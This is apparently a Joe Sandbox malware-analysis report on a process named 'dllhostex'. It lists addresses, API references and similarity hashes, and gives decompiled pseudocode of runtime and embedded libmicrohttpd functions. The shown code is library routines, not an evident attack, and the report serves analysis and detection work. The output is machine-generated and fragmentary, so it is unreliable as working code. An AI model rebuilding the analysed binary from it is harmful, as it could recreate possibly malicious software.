                                                0x01348a0a
                                                0x01348a0a
                                                0x01348a10
                                                0x00000000
                                                0x01348a16
                                                0x01348a16
                                                0x01348a1b
                                                0x01348a1b
                                                0x01348a10
                                                0x01348a08
                                                0x013489fc
                                                0x013489fa
                                                0x013489ee
                                                0x0134897f
                                                0x0134897f
                                                0x01348b52
                                                0x01348b57
                                                0x01348985
                                                0x01348985
                                                0x01348986
                                                0x0134898c
                                                0x01348b4c
                                                0x01348b51
                                                0x01348992
                                                0x01348999
                                                0x00000000
                                                0x013489db
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348b14
                                                0x01348b19
                                                0x00000000
                                                0x00000000
                                                0x01348a58
                                                0x01348a5d
                                                0x00000000
                                                0x00000000
                                                0x01348a46
                                                0x01348a4b
                                                0x00000000
                                                0x00000000
                                                0x013489b7
                                                0x00000000
                                                0x00000000
                                                0x01348a79
                                                0x01348a7e
                                                0x00000000
                                                0x00000000
                                                0x013489d5
                                                0x00000000
                                                0x00000000
                                                0x013489cf
                                                0x00000000
                                                0x00000000
                                                0x01348a7f
                                                0x01348a84
                                                0x00000000
                                                0x00000000
                                                0x013489a5
                                                0x00000000
                                                0x00000000
                                                0x01348a52
                                                0x01348a57
                                                0x00000000
                                                0x00000000
                                                0x013489c3
                                                0x00000000
                                                0x00000000
                                                0x01348afc
                                                0x01348b01
                                                0x00000000
                                                0x00000000
                                                0x013489ab
                                                0x00000000
                                                0x00000000
                                                0x013489c9
                                                0x00000000
                                                0x00000000
                                                0x01348b02
                                                0x01348b07
                                                0x00000000
                                                0x00000000
                                                0x01348b3e
                                                0x01348b43
                                                0x00000000
                                                0x00000000
                                                0x013489bd
                                                0x00000000
                                                0x00000000
                                                0x013489b1
                                                0x00000000
                                                0x00000000
                                                0x013489e1
                                                0x00000000
                                                0x00000000
                                                0x01348b32
                                                0x01348b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348999
                                                0x0134898c
                                                0x0134897f
                                                0x01348974
                                                0x01348976
                                                0x01348976
                                                0x00000000

                                                APIs
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?), ref: 01348908
                                                • LocalFree.KERNEL32(?), ref: 01348954
                                                • DebugBreak.KERNEL32 ref: 0134895A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BreakDebugFormatFreeLocalMessage
                                                • String ID: %s: (%d) %s$(%d) %s$Unknown error$UnregisterWaitEx
                                                • API String ID: 293130274-604287766
                                                • Opcode ID: bc8a39a14e5dcacf3229bdb7a6cd1931f7bac85704cb4a0455dc80ee937c32f6
                                                • Instruction ID: a2c9da4cf0cb2f3e0c6e77c596c225d6f407f526bb5ad4c802834b6be40cd6fc
                                                • Opcode Fuzzy Hash: bc8a39a14e5dcacf3229bdb7a6cd1931f7bac85704cb4a0455dc80ee937c32f6
                                                • Instruction Fuzzy Hash: 64416F5CA01D4157EF2887BC5C6462939D4BF90B29FCC0BE8B629D6BF4D3ACEC406115
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0136E838(intOrPtr _a4) {
                                                				void* _t18;
                                                
                                                				_t45 = _a4;
                                                				if(_a4 != 0) {
                                                					E0136E582(_t45, 7);
                                                					E0136E582(_t45 + 0x1c, 7);
                                                					E0136E582(_t45 + 0x38, 0xc);
                                                					E0136E582(_t45 + 0x68, 0xc);
                                                					E0136E582(_t45 + 0x98, 2);
                                                					E013656E2( *((intOrPtr*)(_t45 + 0xa0)));
                                                					E013656E2( *((intOrPtr*)(_t45 + 0xa4)));
                                                					E013656E2( *((intOrPtr*)(_t45 + 0xa8)));
                                                					E0136E582(_t45 + 0xb4, 7);
                                                					E0136E582(_t45 + 0xd0, 7);
                                                					E0136E582(_t45 + 0xec, 0xc);
                                                					E0136E582(_t45 + 0x11c, 0xc);
                                                					E0136E582(_t45 + 0x14c, 2);
                                                					E013656E2( *((intOrPtr*)(_t45 + 0x154)));
                                                					E013656E2( *((intOrPtr*)(_t45 + 0x158)));
                                                					E013656E2( *((intOrPtr*)(_t45 + 0x15c)));
                                                					return E013656E2( *((intOrPtr*)(_t45 + 0x160)));
                                                				}
                                                				return _t18;
                                                			}





                                                APIs
                                                  • Part of subcall function 0136E582: _free.LIBCMT ref: 0136E5A7
                                                • _free.LIBCMT ref: 0136E886
                                                  • Part of subcall function 013656E2: HeapFree.KERNEL32(00000000,00000000,?,01363C72), ref: 013656F8
                                                  • Part of subcall function 013656E2: GetLastError.KERNEL32(?,?,01363C72), ref: 0136570A
                                                • _free.LIBCMT ref: 0136E891
                                                • _free.LIBCMT ref: 0136E89C
                                                • _free.LIBCMT ref: 0136E8F0
                                                • _free.LIBCMT ref: 0136E8FB
                                                • _free.LIBCMT ref: 0136E906
                                                • _free.LIBCMT ref: 0136E911
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: d88494da7d7ae054f2fc9a1e636b90c94f4d2051a51bd66432de367e38d34c7d
                                                • Instruction ID: ebd5affeb201d0c347a020923443b74fcd5f3d4ff6ae480240c4c9e46c4bfa2c
                                                • Opcode Fuzzy Hash: d88494da7d7ae054f2fc9a1e636b90c94f4d2051a51bd66432de367e38d34c7d
                                                • Instruction Fuzzy Hash: 75116D39542B1AEAD520FBB8CC45FCB7B9D5F10748F80CC35A39B67054EA24EA098A50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 40%
                                                			E013490A0(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __ebp, intOrPtr _a4) {
                                                				signed int _v4;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				struct _CRITICAL_SECTION* _v32;
                                                				void* __esi;
                                                				signed int _t57;
                                                				signed int _t59;
                                                				intOrPtr _t61;
                                                				struct _CRITICAL_SECTION* _t62;
                                                				signed int* _t64;
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				void* _t68;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				void* _t78;
                                                				intOrPtr _t85;
                                                				signed int _t87;
                                                				signed int** _t93;
                                                				signed int _t94;
                                                				signed int* _t95;
                                                				signed int _t99;
                                                				signed int _t100;
                                                				signed int _t102;
                                                				signed int _t103;
                                                				signed int _t104;
                                                				void* _t105;
                                                				signed int _t106;
                                                				signed int _t107;
                                                				signed int _t108;
                                                				intOrPtr* _t109;
                                                				signed int* _t111;
                                                				signed int* _t112;
                                                				signed int _t113;
                                                				signed int _t114;
                                                				signed int** _t116;
                                                				signed int _t118;
                                                
                                                				_t105 = __edx;
                                                				_t118 =  &_v32;
                                                				_t57 =  *0x13cc074; // 0x4132269f
                                                				_v4 = _t57 ^ _t118;
                                                				_t113 = __ecx;
                                                				_t59 =  *(__ecx + 0x60);
                                                				if(_t59 == 0) {
                                                					L3:
                                                					if( *((intOrPtr*)(_t113 + 0xe0)) == 0) {
                                                						L64:
                                                						return E01353717(_v4 ^ _t118, _t113);
                                                					}
                                                					_t61 = _a4;
                                                					asm("xorps xmm0, xmm0");
                                                					asm("movlpd [esp+0x1c], xmm0");
                                                					asm("movlpd [esp+0x24], xmm0");
                                                					if(_t61 != 0x10) {
                                                						if(_t61 != 0x1c) {
                                                							goto L64;
                                                						}
                                                						asm("movups xmm0, [edx+0x8]");
                                                						_v28 = 0x17;
                                                						asm("movups [esp+0x18], xmm0");
                                                						goto L8;
                                                					} else {
                                                						_v28 = 2;
                                                						_v24 =  *((intOrPtr*)(_t105 + 4));
                                                						L8:
                                                						_t62 = _t113 + 0x84;
                                                						_v32 = _t62;
                                                						EnterCriticalSection(_t62);
                                                						_t116 = _t113 + 0x68;
                                                						_t93 = _t116;
                                                						if(_t93 == 0) {
                                                							L23:
                                                							 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1c7, "Failed to find previously-added IP address\n");
                                                							_t118 = _t118 + 0x10;
                                                							L24:
                                                							_t64 =  *_t93;
                                                							if(_t64 == 0) {
                                                								goto L23;
                                                							}
                                                							_t94 =  *_t64;
                                                							_t65 =  *((intOrPtr*)(_t94 + 0x14));
                                                							if(_t65 == 0) {
                                                								_t65 =  *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1cd, "Previously-added IP address had counter of zero\n");
                                                								_t118 = _t118 + 0x10;
                                                							}
                                                							_t66 = _t65 + 0xffffffff;
                                                							 *((intOrPtr*)(_t94 + 0x14)) = _t66;
                                                							if(_t66 != 0) {
                                                								L63:
                                                								LeaveCriticalSection(_v32);
                                                								goto L64;
                                                							} else {
                                                								if(_t116 == 0) {
                                                									L62:
                                                									E0135C9E5(_t94);
                                                									_t118 = _t118 + 4;
                                                									goto L63;
                                                								}
                                                								_t111 =  *_t116;
                                                								if(_t111 == 0) {
                                                									goto L62;
                                                								}
                                                								_t106 =  *_t111;
                                                								_t99 = _t94;
                                                								_t113 = 0x10;
                                                								while(1) {
                                                									_t68 =  *_t99;
                                                									if(_t68 !=  *_t106) {
                                                										break;
                                                									}
                                                									_t99 = _t99 + 4;
                                                									_t106 = _t106 + 4;
                                                									_t113 = _t113 - 4;
                                                									if(_t113 >= 0) {
                                                										continue;
                                                									}
                                                									_t107 = 0;
                                                									L40:
                                                									if(_t107 == 0) {
                                                										L53:
                                                										_t114 = _t111[1];
                                                										_t100 = _t111[2];
                                                										if(_t114 == 0) {
                                                											L57:
                                                											_t113 = _t100;
                                                											L61:
                                                											E0135C9E5( *_t116);
                                                											_t118 = _t118 + 4;
                                                											 *_t116 = _t113;
                                                											goto L62;
                                                										}
                                                										if(_t100 == 0) {
                                                											goto L61;
                                                										}
                                                										_t70 =  *(_t100 + 4);
                                                										if(_t70 != 0) {
                                                											_t113 = _t70;
                                                											_t71 =  *(_t113 + 4);
                                                											if(_t71 == 0) {
                                                												L60:
                                                												 *(_t100 + 4) =  *(_t113 + 8);
                                                												 *(_t113 + 4) = ( *_t116)[1];
                                                												 *(_t113 + 8) = ( *_t116)[2];
                                                												goto L61;
                                                											} else {
                                                												goto L59;
                                                											}
                                                											do {
                                                												L59:
                                                												_t100 = _t113;
                                                												_t113 = _t71;
                                                												_t71 =  *(_t113 + 4);
                                                											} while (_t71 != 0);
                                                											goto L60;
                                                										}
                                                										 *(_t100 + 4) = _t114;
                                                										goto L57;
                                                									} else {
                                                										goto L41;
                                                									}
                                                									while(1) {
                                                										L41:
                                                										_t116 =  >=  ?  &(( *_t116)[2]) :  &(( *_t116)[1]);
                                                										_t111 =  *_t116;
                                                										if(_t111 == 0) {
                                                											goto L62;
                                                										}
                                                										_t108 =  *_t111;
                                                										_t102 = _t94;
                                                										_t113 = 0x10;
                                                										while(1) {
                                                											_t78 =  *_t102;
                                                											if(_t78 !=  *_t108) {
                                                												break;
                                                											}
                                                											_t102 = _t102 + 4;
                                                											_t108 = _t108 + 4;
                                                											_t113 = _t113 - 4;
                                                											if(_t113 >= 0) {
                                                												continue;
                                                											}
                                                											_t107 = 0;
                                                											L52:
                                                											if(_t107 != 0) {
                                                												goto L41;
                                                											}
                                                											goto L53;
                                                										}
                                                										if(_t78 !=  *_t108 ||  *((intOrPtr*)(_t102 + 1)) !=  *((intOrPtr*)(_t108 + 1)) ||  *((intOrPtr*)(_t102 + 2)) !=  *((intOrPtr*)(_t108 + 2)) ||  *((intOrPtr*)(_t102 + 3)) !=  *((intOrPtr*)(_t108 + 3))) {
                                                											asm("sbb edx, edx");
                                                											_t107 = _t108 | 0x00000001;
                                                										} else {
                                                											_t107 = 0;
                                                										}
                                                										goto L52;
                                                									}
                                                									goto L62;
                                                								}
                                                								if(_t68 !=  *_t106 ||  *((intOrPtr*)(_t99 + 1)) !=  *((intOrPtr*)(_t106 + 1)) ||  *((intOrPtr*)(_t99 + 2)) !=  *((intOrPtr*)(_t106 + 2)) ||  *((intOrPtr*)(_t99 + 3)) !=  *((intOrPtr*)(_t106 + 3))) {
                                                									asm("sbb edx, edx");
                                                									_t107 = _t106 | 0x00000001;
                                                								} else {
                                                									_t107 = 0;
                                                								}
                                                								goto L40;
                                                							}
                                                						}
                                                						_t112 =  *_t93;
                                                						if(_t112 == 0) {
                                                							goto L23;
                                                						}
                                                						do {
                                                							_t103 =  *_t112;
                                                							_t109 =  &_v28;
                                                							_t113 = 0x10;
                                                							while(1) {
                                                								_t85 =  *_t109;
                                                								if(_t85 !=  *_t103) {
                                                									break;
                                                								}
                                                								_t109 = _t109 + 4;
                                                								_t103 = _t103 + 4;
                                                								_t113 = _t113 - 4;
                                                								if(_t113 >= 0) {
                                                									continue;
                                                								}
                                                								_t104 = 0;
                                                								L21:
                                                								if(_t104 == 0) {
                                                									goto L24;
                                                								}
                                                								goto L22;
                                                							}
                                                							if(_t85 !=  *_t103 ||  *((intOrPtr*)(_t109 + 1)) !=  *((intOrPtr*)(_t103 + 1)) ||  *((intOrPtr*)(_t109 + 2)) !=  *((intOrPtr*)(_t103 + 2)) ||  *((intOrPtr*)(_t109 + 3)) !=  *((intOrPtr*)(_t103 + 3))) {
                                                								asm("sbb ecx, ecx");
                                                								_t104 = _t103 | 0x00000001;
                                                							} else {
                                                								_t104 = 0;
                                                							}
                                                							goto L21;
                                                							L22:
                                                							_t95 =  &(_t112[1]);
                                                							_t87 = 0 | _t104 > 0x00000000;
                                                							_t112 = _t95[_t87];
                                                							_t93 =  &(_t95[_t87]);
                                                						} while (_t112 != 0);
                                                						goto L23;
                                                					}
                                                				} else {
                                                					do {
                                                						_t113 = _t59;
                                                						_t59 =  *(_t113 + 0x60);
                                                					} while (_t59 != 0);
                                                					goto L3;
                                                				}
                                                			}

                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 01349124
                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,?,0000009C), ref: 01349316
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 013491D9
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 013491AC
                                                • Previously-added IP address had counter of zero, xrefs: 013491CF
                                                • Failed to find previously-added IP address, xrefs: 013491A2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID: Failed to find previously-added IP address$Previously-added IP address had counter of zero$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 3168844106-1660310532
                                                • Opcode ID: 7082168197562158b9f58bce18fb372eb66c8f14536d18e2e3ef84ec7d504a1f
                                                • Instruction ID: adfda3dd27fb3b9c85ce70ea5113729d736c98e76cd5b2402f3a42d81564d4f9
                                                • Opcode Fuzzy Hash: 7082168197562158b9f58bce18fb372eb66c8f14536d18e2e3ef84ec7d504a1f
                                                • Instruction Fuzzy Hash: 5B81A6316042499FDB26CF2DC451777BBE2BF8A61CF5986ACD4898B246D731F942CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E01360096(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed char _v15;
                                                				char _v16;
                                                				void _v24;
                                                				char _v28;
                                                				void* _v29;
                                                				char _v35;
                                                				void _v36;
                                                				intOrPtr _v40;
                                                				long _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr* _v52;
                                                				void* _v56;
                                                				signed int _v60;
                                                				int _v64;
                                                				long _v68;
                                                				void* __esi;
                                                				signed int _t83;
                                                				signed int _t85;
                                                				int _t91;
                                                				intOrPtr* _t93;
                                                				void* _t100;
                                                				void* _t102;
                                                				intOrPtr _t103;
                                                				long _t107;
                                                				void _t115;
                                                				void* _t124;
                                                				signed int _t129;
                                                				signed int _t131;
                                                				signed char _t135;
                                                				signed int _t140;
                                                				signed char _t141;
                                                				intOrPtr* _t142;
                                                				intOrPtr _t143;
                                                				signed char _t144;
                                                				intOrPtr* _t147;
                                                				intOrPtr* _t148;
                                                				signed int _t150;
                                                				void* _t151;
                                                				void* _t152;
                                                
                                                				_t83 =  *0x13cc074; // 0x4132269f
                                                				_v8 = _t83 ^ _t150;
                                                				_t85 = _a8;
                                                				_t142 = _a12;
                                                				_t129 = (_t85 & 0x0000003f) * 0x30;
                                                				_t131 = _t85 >> 6;
                                                				_v52 = _t142;
                                                				_v60 = _t131;
                                                				_v56 =  *((intOrPtr*)(_t129 +  *((intOrPtr*)(0x13d5278 + _t131 * 4)) + 0x18));
                                                				_v48 = _a16 + _t142;
                                                				_t91 = GetConsoleCP();
                                                				_t148 = _a4;
                                                				_v64 = _t91;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t93 = _v52;
                                                				_t147 = _t93;
                                                				if(_t93 < _v48) {
                                                					_v40 = _t93 + 1;
                                                					do {
                                                						_v28 = 0;
                                                						_v35 =  *_t147;
                                                						_t143 =  *((intOrPtr*)(0x13d5278 + _v60 * 4));
                                                						_t135 =  *(_t129 + _t143 + 0x2d);
                                                						if((_t135 & 0x00000004) == 0) {
                                                							_v29 =  *_t147;
                                                							_t100 = E01361CCD(_t143);
                                                							_t144 = _v29;
                                                							_t148 = _a4;
                                                							if( *((intOrPtr*)(_t100 + (_t144 & 0x000000ff) * 2)) >= 0) {
                                                								_push(1);
                                                								_push(_t147);
                                                								goto L9;
                                                							} else {
                                                								if(_v40 >= _v48) {
                                                									_t140 = _v60;
                                                									 *(_t129 +  *((intOrPtr*)(0x13d5278 + _t140 * 4)) + 0x2e) = _t144;
                                                									 *(_t129 +  *((intOrPtr*)(0x13d5278 + _t140 * 4)) + 0x2d) =  *(_t129 +  *((intOrPtr*)(0x13d5278 + _t140 * 4)) + 0x2d) | 0x00000004;
                                                									 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) + 1;
                                                								} else {
                                                									_t124 = E013658AE( &_v28, _t147, 2);
                                                									_t152 = _t151 + 0xc;
                                                									if(_t124 != 0xffffffff) {
                                                										_t147 = _t147 + 1;
                                                										_t103 = _v40 + 1;
                                                										goto L11;
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							_t141 = _t135 & 0x000000fb;
                                                							_v16 =  *((intOrPtr*)(_t143 + _t129 + 0x2e));
                                                							_push(2);
                                                							_v15 = _t141;
                                                							 *(_t129 + _t143 + 0x2d) = _t141;
                                                							_push( &_v16);
                                                							L9:
                                                							_push( &_v28);
                                                							_t102 = E013658AE();
                                                							_t152 = _t151 + 0xc;
                                                							if(_t102 != 0xffffffff) {
                                                								_t103 = _v40;
                                                								L11:
                                                								_t147 = _t147 + 1;
                                                								_v40 = _t103 + 1;
                                                								_t107 = E01369D7F(_v64, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                								_t151 = _t152 + 0x20;
                                                								_v68 = _t107;
                                                								if(_t107 != 0) {
                                                									if(WriteFile(_v56,  &_v24, _t107,  &_v44, 0) == 0) {
                                                										L21:
                                                										 *_t148 = GetLastError();
                                                									} else {
                                                										 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 8)) - _v52 + _t147;
                                                										if(_v44 >= _v68) {
                                                											if(_v35 != 0xa) {
                                                												goto L18;
                                                											} else {
                                                												_t115 = 0xd;
                                                												_v36 = _t115;
                                                												if(WriteFile(_v56,  &_v36, 1,  &_v44, 0) == 0) {
                                                													goto L21;
                                                												} else {
                                                													if(_v44 >= 1) {
                                                														 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t148 + 8)) + 1;
                                                														 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) + 1;
                                                														goto L18;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L22;
                                                						L18:
                                                					} while (_t147 < _v48);
                                                				}
                                                				L22:
                                                				return E01353717(_v8 ^ _t150, _t148);
                                                			}












































                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,0136082C,?,00000000,00000000,?), ref: 013600D8
                                                • __fassign.LIBCMT ref: 01360162
                                                • __fassign.LIBCMT ref: 01360181
                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 013601D0
                                                • WriteFile.KERNEL32(?,0136082C,00000001,?,00000000), ref: 0136020A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$Console
                                                • String ID:
                                                • API String ID: 3692784241-0
                                                • Opcode ID: 4485dbdc0572eff590311528d5aa42c51271a7e2997cf21348a6dcf12ff59282
                                                • Instruction ID: 3c762d8e2d3e44302e03f9137cd7d7459562334951272f89f06a09c905ecfe76
                                                • Opcode Fuzzy Hash: 4485dbdc0572eff590311528d5aa42c51271a7e2997cf21348a6dcf12ff59282
                                                • Instruction Fuzzy Hash: 01519EB1A00249AFDF15CFE8D886AEEBBFCEF09314F04816AF555E7285D2309905CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E01341700(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                				void* _t196;
                                                				void* _t204;
                                                				signed int _t209;
                                                				intOrPtr _t213;
                                                
                                                				_t204 = __ebx;
                                                				_t217 = __ecx;
                                                				_t206 =  *(__ecx + 0x2c);
                                                				_t213 =  *((intOrPtr*)(__ecx + 4));
                                                				if(( *(__ecx + 0x2c) & 0x00000001) != 0) {
                                                					L52:
                                                					return _t196;
                                                				} else {
                                                					 *((intOrPtr*)(__ecx + 0xc)) = __edx;
                                                					_t209 =  *((intOrPtr*)(__ecx + 8)) - 1;
                                                					if(_t209 > 0xf) {
                                                						L95:
                                                						E0135EBB9(_t204, _t206, _t209, _t213, _t217);
                                                						goto L96;
                                                					} else {
                                                						switch( *((intOrPtr*)(_t209 * 4 +  &M01341B10))) {
                                                							case 0:
                                                								__eflags =  *((char*)(__esi + 0x70));
                                                								if( *((char*)(__esi + 0x70)) == 0) {
                                                									__eax =  *(__esi + 0x2c);
                                                									__eflags = __al & 0x00000020;
                                                									if((__al & 0x00000020) == 0) {
                                                										 *(__esi + 0x2c) = __eax;
                                                										__eax =  *(__edi + 0x2c);
                                                										 *(__esi + 0x28) =  *(__edi + 0x2c);
                                                										 *(__edi + 0x2c) = __esi;
                                                									}
                                                								}
                                                								goto L20;
                                                							case 1:
                                                								__eflags = __cl & 0x00000004;
                                                								if((__cl & 0x00000004) == 0) {
                                                									goto L49;
                                                								} else {
                                                									__eflags =  *(__edi + 0x38) - __esi;
                                                									if( *(__edi + 0x38) == __esi) {
                                                										__eax =  *(__esi + 0x34);
                                                										 *(__edi + 0x38) =  *(__esi + 0x34);
                                                									}
                                                									__eflags =  *(__edi + 0x44) - __esi;
                                                									if( *(__edi + 0x44) == __esi) {
                                                										__eax =  *(__esi + 0x34);
                                                										 *(__edi + 0x44) =  *(__esi + 0x34);
                                                									}
                                                									goto L58;
                                                								}
                                                								goto L97;
                                                							case 2:
                                                								__ecx = __esi;
                                                								__eax = E013402D0(__esi);
                                                								__ecx =  *(__esi + 0x2c);
                                                								__ecx = __ecx & 0x0000000c;
                                                								__eflags = __al - 0xc;
                                                								if(__al != 0xc) {
                                                									__eax =  *(__esi + 4);
                                                									_t186 = __eax + 4;
                                                									 *_t186 =  *(__eax + 4) + 1;
                                                									__eflags =  *_t186;
                                                									__ecx =  *(__esi + 0x2c);
                                                								}
                                                								__ecx = __ecx & 0xfffffffb;
                                                								__ecx = __ecx | 0x00000001;
                                                								__eflags =  *(__esi + 0x74);
                                                								goto L43;
                                                							case 3:
                                                								__eflags = __cl & 0x00000004;
                                                								if((__cl & 0x00000004) == 0) {
                                                									goto L49;
                                                								} else {
                                                									__ecx =  *(__esi + 0x30);
                                                									 *__ecx = 0;
                                                									 *(__esi + 0x30) = 0;
                                                									__eflags =  *(__ecx + 0x4c) & 0x00000004;
                                                									if(( *(__ecx + 0x4c) & 0x00000004) != 0) {
                                                										__ecx = __ecx + 0x20;
                                                										__edx = 0x1348e60;
                                                										__eax = E01341700(__ebx, __ecx, 0x1348e60, __edi, __esi);
                                                									}
                                                									goto L62;
                                                								}
                                                								goto L97;
                                                							case 4:
                                                								goto L95;
                                                							case 5:
                                                								__eflags = __cl & 0x00000004;
                                                								if((__cl & 0x00000004) == 0) {
                                                									goto L49;
                                                								} else {
                                                									__eflags =  *(__edi + 0x3c) - __esi;
                                                									if( *(__edi + 0x3c) == __esi) {
                                                										__eax =  *(__esi + 0x34);
                                                										 *(__edi + 0x3c) =  *(__esi + 0x34);
                                                									}
                                                									__eflags =  *(__edi + 0x48) - __esi;
                                                									if( *(__edi + 0x48) == __esi) {
                                                										__eax =  *(__esi + 0x34);
                                                										 *(__edi + 0x48) =  *(__esi + 0x34);
                                                									}
                                                									goto L58;
                                                								}
                                                								goto L97;
                                                							case 6:
                                                								__eflags = __ecx & 0x00001000;
                                                								if((__ecx & 0x00001000) != 0) {
                                                									__ecx = __ecx & 0xffffefff;
                                                									_t12 = __esi + 0x40;
                                                									 *_t12 = 0xffffffff +  *(__esi + 0x40);
                                                									__eflags =  *_t12;
                                                									__edx = __ecx;
                                                									 *(__esi + 0x2c) = __ecx;
                                                									__eax = __ecx;
                                                									if( *_t12 == 0) {
                                                										__eflags = __dl & 0x00000001;
                                                										if((__dl & 0x00000001) == 0) {
                                                											__eflags = __al & 0x00000004;
                                                											if((__al & 0x00000004) != 0) {
                                                												__ecx = __ecx & 0xfffffffb;
                                                												 *(__esi + 0x2c) = __ecx;
                                                												__eflags = __cl & 0x00000008;
                                                												if((__cl & 0x00000008) != 0) {
                                                													_t22 = __edi + 4;
                                                													 *_t22 =  *(__edi + 4) - 1;
                                                													__eflags =  *_t22;
                                                													__ecx =  *(__esi + 0x2c);
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__eflags = __cl & 0x00000040;
                                                								if(__eflags != 0) {
                                                									__ecx = __ecx & 0xffffffbf;
                                                									_t27 = __esi + 0x40;
                                                									 *_t27 = 0xffffffff +  *(__esi + 0x40);
